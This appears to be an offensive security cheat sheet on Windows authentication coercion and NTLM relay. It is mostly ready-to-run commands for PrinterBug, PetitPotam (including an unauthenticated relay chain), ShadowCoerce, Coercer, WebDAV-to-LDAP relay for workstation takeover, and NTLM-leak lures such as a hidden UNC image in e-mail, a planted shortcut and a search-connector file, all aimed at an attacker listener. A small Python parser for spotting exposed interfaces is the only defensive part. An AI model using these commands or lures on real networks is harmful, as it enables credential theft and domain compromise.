Authentication Coercion
Printer Bug (MS-RPRN)
Check if the Spooler service is exposed (MS-RPRN / MS-PAR interfaces registered with the RPC endpoint mapper on 135/tcp):
$ rpcdump.py MEGACORP/snovvcrash:'Passw0rd!'@192.168.1.11 | grep -A2 -e MS-RPRN -e MS-PAR
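The grep above only catches the two printer interfaces. The following Python is an added example (not code from the page or from impacket) that parses rpcdump.py output and reports every coercion interface from this page that the host has registered with the endpoint mapper, keyed on interface UUID so it works even where rpcdump prints "Protocol: N/A". The sample output is constructed, not a real capture. Caveat: the endpoint mapper only lists registered interfaces; named-pipe interfaces such as MS-EFSR are commonly reachable over \pipe\lsarpc without an EPM entry, so an empty result does not rule PetitPotam out.

```python
import re
from typing import Dict, List

# Interface UUIDs (from the MS-* specifications) behind the coercion primitives
# on this page. Matching on UUID works even where rpcdump prints "Protocol: N/A".
COERCION_INTERFACES = {
    "12345678-1234-abcd-ef00-0123456789ab": "MS-RPRN (PrinterBug / SpoolSample)",
    "76f03f96-cdfd-44fc-a22c-64950a001209": "MS-PAR (PrinterBug, async print interface)",
    "c681d488-d850-11d0-8c52-00c04fd90f7e": "MS-EFSR (PetitPotam)",
    "df1941c5-fe89-4e79-bf10-463657acf44d": "MS-EFSR (PetitPotam)",
    "a8e0653c-2744-4389-a61d-7373df8b2292": "MS-FSRVP (ShadowCoerce)",
    "82273fdc-e32a-18c3-3f78-827929dc23ea": "MS-EVEN (EvilentCoerce)",
}

UUID_RE = re.compile(r"^UUID\s*:\s*([0-9A-Fa-f-]{36})(?:\s+v([\d.]+))?", re.M)
PROVIDER_RE = re.compile(r"^Provider\s*:\s*(.+?)\s*$", re.M)
BINDING_RE = re.compile(r"^[ \t]+((?:ncacn|ncadg|ncalrpc)\S*)[ \t]*$", re.M)


def parse_rpcdump(output: str) -> List[Dict]:
    """One record per blank-line-separated endpoint block of rpcdump.py output."""
    records = []
    for block in re.split(r"\n\s*\n", output.strip()):
        m = UUID_RE.search(block)
        if not m:
            continue
        prov = PROVIDER_RE.search(block)
        records.append({
            "uuid": m.group(1).lower(),
            "version": m.group(2),
            "provider": prov.group(1) if prov else None,
            "bindings": BINDING_RE.findall(block),
        })
    return records


def coercion_surface(output: str) -> Dict[str, List[str]]:
    """Coercion interfaces registered with the endpoint mapper, with their bindings.

    An empty result only means nothing is *registered*: named-pipe interfaces such
    as MS-EFSR are commonly reachable over \\pipe\\lsarpc without an EPM entry.
    """
    found: Dict[str, List[str]] = {}
    for rec in parse_rpcdump(output):
        name = COERCION_INTERFACES.get(rec["uuid"])
        if name:
            found.setdefault(name, []).extend(rec["bindings"])
    return found


# Constructed sample in rpcdump.py's layout (not a real capture).
SAMPLE_RPCDUMP = r"""
Protocol: [MS-RPRN]: Print System Remote Protocol
Provider: spoolsv.exe
UUID    : 12345678-1234-ABCD-EF00-0123456789AB v1.0
Bindings:
          ncacn_ip_tcp:192.168.1.11[49667]
          ncacn_np:\\DC01[\pipe\spoolss]

Protocol: N/A
Provider: N/A
UUID    : A8E0653C-2744-4389-A61D-7373DF8B2292 v1.0
Bindings:
          ncacn_np:\\DC01[\pipe\FssagentRpc]

Protocol: [MS-SCMR]: Service Control Manager Remote Protocol
Provider: services.exe
UUID    : 367ABB81-9844-35F1-AD32-98F038001003 v2.0
Bindings:
          ncacn_ip_tcp:192.168.1.11[49669]
"""

if __name__ == "__main__":
    for name, bindings in coercion_surface(SAMPLE_RPCDUMP).items():
        print(name)
        for b in bindings:
            print("   ", b)
```

Feed it the real thing with `coercion_surface(open("rpcdump.txt").read())` after redirecting rpcdump.py into a file; the bindings tell you whether the interface is reachable over a TCP endpoint or only via a named pipe on 445.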
SpoolSample
Cmd > .\SpoolSample.exe 192.168.1.11 10.10.13.37
Cmd > .\SpoolSample.exe 192.168.1.11 attacker@80/test.txt
Cmd > .\SpoolSample.exe 192.168.1.11 attacker@SSL/test.txt
dementor.py
$ python dementor.py -d megacorp.local -u snovvcrash -p 'Passw0rd!' 10.10.13.37 DC01.megacorp.local
$ python dementor.py -d megacorp.local -u snovvcrash -p 'Passw0rd!' attacker@80/test.txt DC01.megacorp.local
$ python dementor.py -d megacorp.local -u snovvcrash -p 'Passw0rd!' attacker@SSL/test.txt DC01.megacorp.local
printerbug.py
$ python printerbug.py megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local 10.10.13.37
$ python printerbug.py megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local attacker@80/test.txt
$ python printerbug.py megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local attacker@SSL/test.txt
PetitPotam (MS-EFSR)
CVE-2021-36942
$ python3 PetitPotam.py -d '' -u '' -p '' 10.10.13.37 192.168.1.11 [-pipe all]
$ python3 PetitPotam.py -d '' -u '' -p '' attacker@80/test.txt 192.168.1.11
$ python3 PetitPotam.py -d '' -u '' -p '' attacker@SSL/test.txt 192.168.1.11
Cmd > .\PetitPotam.exe 10.10.13.37 192.168.1.11 1
Cmd > .\PetitPotam.exe attacker@80/test.txt 192.168.1.11 1
Cmd > .\PetitPotam.exe attacker@SSL/test.txt 192.168.1.11 1
PetitPotam any host (not only a DC that allows null sessions on the IPC$ share) without initial creds, by proxying through an authenticated SMB session obtained by relaying a DC machine account to the target. A direct unauthenticated attempt against a member server fails:
$ python3 PetitPotam.py -d '' -u '' -p '' 10.10.13.37 192.168.1.11
Something went wrong, check error status => SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
Start ntlmrelayx in SOCKS mode with the member server as relay target (SMB signing must not be required on it), then coerce the DC with a null session so that DC1$ gets relayed and the session is kept open:
$ ntlmrelayx.py -ip 10.10.13.37 -t 192.168.1.11 -smb2support -socks --no-http-server --no-wcf-server --no-raw-server
$ python3 PetitPotam.py -d '' -u '' -p '' 10.10.13.37 DC1.megacorp.local
ntlmrelayx> socks
ntlmrelayx> stopservers
Stopping the relay servers frees 445/tcp for Responder. Then run PetitPotam through the SOCKS proxy as DC1$ (ntlmrelayx's SOCKS server reuses the relayed session, so no password is needed) to make the member server authenticate to the Responder host:
$ sudo ./Responder.py -I eth0 -vA
$ proxychains4 python3 PetitPotam.py -d MEGACORP -u 'DC1$' -no-pass 10.10.13.37 192.168.1.11
With Kerberos authentication:
$ getTGT.py megacorp.local/snovvcrash -hashes e929e69f7c290222be87968263a9282e:e929e69f7c290222be87968263a9282e -dc-ip 192.168.1.11
$ KRB5CCNAME=`pwd`/snovvcrash.ccache python3 PetitPotam.py -k -no-pass -d megacorp.local -u snovvcrash attacker.megacorp.local target.megacorp.local
Positional arguments are listener first, then target; with -k the target must be given as a hostname (FQDN) so the CIFS service ticket can be requested for it.
Theory
Mitigation
ShadowCoerce (MS-FSRVP)
$ python3 shadowcoerce.py -d megacorp.local -u snovvcrash -p 'Passw0rd!' 10.10.13.37 192.168.1.11
EvilentCoerce (MS-EVEN)
WebDAV (WebClient)
Check whether a callback over WebDAV (HTTP) is possible: it is when the WebClient service is running on the target. NTLM over HTTP carries no signing requirement, so the coerced machine account can be relayed to LDAP/LDAPS to write msDS-AllowedToActOnBehalfOfOtherIdentity on the victim's computer object (RBCD) and take over the workstation.
Check via PowerShell:
PS > Install-Module -Name NtObjectManager
PS > Get-NtFile -Win32Path '\\192.168.1.11\pipe\DAV RPC SERVICE'
Check via CME:
$ cme smb smb.txt -u snovvcrash -p 'Passw0rd!' -M webdav | grep -a 'WebClient Service enabled'
Check via GetWebDAVStatus:
PS > .\GetWebDAVStatus.exe SRV01,SRV02 --tc 1
Enable WebClient
Put a .searchConnector-ms file on a writable share. When a domain user opens that folder in Explorer, the WebClient service starts automatically on the user's workstation:
<?xml version="1.0" encoding="UTF-8"?>
<searchConnectorDescription xmlns="http://schemas.microsoft.com/windows/2009/searchConnector">
<description>Microsoft Outlook</description>
<isSearchOnlyItem>false</isSearchOnlyItem>
<includeInStartMenuScope>true</includeInStartMenuScope>
<templateInfo>
<folderType>{91475FE5-586B-4EBA-8D75-D17434B8CDF6}</folderType>
</templateInfo>
<simpleLocation>
<url>https://whatever/</url>
</simpleLocation>
</searchConnectorDescription>
CVE-2022-30216
NTLM Leak
Leak with PowerShell:
PS > IWR -UseDefaultCredentials http://10.10.13.37/index.html
Leak with Python:
# Requires pywin32. WinHTTP sends the current user's credentials to the target host
# when the auto-logon policy is Always (0); the default only does so for the intranet zone.
import win32com.client
URL = 'http://10.10.13.37/index.html'
COM_OBJ = win32com.client.Dispatch('WinHTTP.WinHTTPRequest.5.1')
COM_OBJ.SetAutoLogonPolicy(0)  # AutoLogonPolicy_Always
COM_OBJ.Open('GET', URL, False)
COM_OBJ.Send()
print(COM_OBJ.ResponseText)
Leak with rpcping (catch with Responder's DCE-RPC listener):
Cmd > rpcping -s 10.10.13.37 -e 135 -a privacy -u NTLM
Leak with a hidden image in an HTML file or e-mail (the UNC source is fetched over SMB when the HTML is rendered by an engine that resolves UNC paths):
<img src="\\10.10.13.37\pwn.ico" height="1" width="1" />
Leak with a shortcut (Explorer fetches IconLocation over SMB as soon as the folder containing the .lnk is listed):
$wsh = New-Object -ComObject WScript.Shell
$lnk = $wsh.CreateShortcut("\\SRV01\PublicShare\pwn.lnk")
$lnk.IconLocation = "\\10.10.13.37\pwn.ico"
$lnk.Save()
Leak with curl:
Cmd > curl.exe -i --ntlm -u : http://10.10.13.37/index.html
Tools
Coercer
$ coercer coerce -u snovvcrash -p 'Passw0rd!' -f dc.txt -l 10.10.13.37 [--filter-pipe-name efsrpc] [--filter-method-name EfsRpcDuplicateEncryptionInfoFile] --auth-type smb --always-continue --delay 1